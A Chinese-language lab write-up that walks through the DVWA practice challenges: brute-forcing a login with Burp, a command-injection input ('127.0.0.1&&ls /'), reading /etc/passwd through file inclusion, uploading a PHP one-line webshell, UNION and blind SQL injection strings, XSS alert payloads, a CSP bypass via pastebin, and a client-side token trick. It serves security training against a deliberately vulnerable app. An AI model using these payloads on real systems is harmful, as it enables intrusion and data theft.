rois五一大礼包

目录

  • rois 5.1大礼包-dvwa
    • Brute Force = 尝试登录成功
    • Command Injection = 尝试在服务器上列根目录
    • File Inclusion = 尝试读取到服务器的密码
    • File Upload = 上传一个PHP木马,并连接成功
    • SQL Injection = 尝试拿到当前表名
    • SQL Injection (Blind) = 尝试拿到当前数据库名
    • XSS (DOM) = 尝试弹一个对话框
    • XSS (Reflected) = 尝试弹一个对话框
    • XSS (Stored) = 尝试弹一个对话框
    • CSP Bypass = 尝试弹一个对话框
    • JavaScript = 尝试拿到正确的Token

rois 5.1大礼包-dvwa

Brute Force = 尝试登录成功

Burp抓包->发送到Intruder->猜测用户名为admin->用字典爆破
得到密码password
rois五一大礼包_第1张图片

Command Injection = 尝试在服务器上列根目录

输入127.0.0.1&&ls /

File Inclusion = 尝试读取到服务器的密码

输入etc/passwd
得到

root: x:0:0:root:/root:/bin/bash daemon: x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
然后不会了。。

File Upload = 上传一个PHP木马,并连接成功

上传一句话木马
访问https://sqli-lab.practice.rois.io/hackable/uploads/1.php
rois五一大礼包_第2张图片用菜刀无法连接总是出现500
百度找过狗一句话
最后找到一个可以用的

  

rois五一大礼包_第3张图片

SQL Injection = 尝试拿到当前表名

依次输入
1’ union select 1,database()#
1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘dvwa’#
得到表名 guestbook,users
rois五一大礼包_第4张图片

SQL Injection (Blind) = 尝试拿到当前数据库名

1.输入1’ and length(database())>4#提示不存在
输入1’ and length(database())>3#存在,所以数据库名的长度为4
2.然后用1’ and ascii(substr(database(),n,1))>100#来获得数据库名
3.最后得到数据库名为dvwa

XSS (DOM) = 尝试弹一个对话框

rois五一大礼包_第5张图片
查看源代码发现上述位置可以进行XSS攻击
访问https://sqli-lab.practice.rois.io/vulnerabilities/xss_d/?default=%3Cscript%3Ealert(0)%3C/script%3E 即可
rois五一大礼包_第6张图片

XSS (Reflected) = 尝试弹一个对话框

rois五一大礼包_第7张图片
输入直接输入即可
rois五一大礼包_第8张图片

XSS (Stored) = 尝试弹一个对话框

rois五一大礼包_第9张图片直接输入即可
rois五一大礼包_第10张图片

CSP Bypass = 尝试弹一个对话框

查看源代码
Content-Security-Policy: script-src 'self' https://pastebin.com example.com code.jquery.com https://ssl.google-analytics.com ;

发现可以加载https://pastebin.com中的script
去https://pastebin.com发布alert(1)
在输入框中填入https://pastebin.com/raw/HLLRVw2F
成功弹出一个对话框
rois五一大礼包_第11张图片

JavaScript = 尝试拿到正确的Token

提交success发现提示错误的token
看源代码发现token是在前台生成的所以只要输入success在执行一次generate_token()就可以了
rois五一大礼包_第12张图片token=38581812b435834ebf84ebcc2c6424d6

你可能感兴趣的:(rois五一大礼包)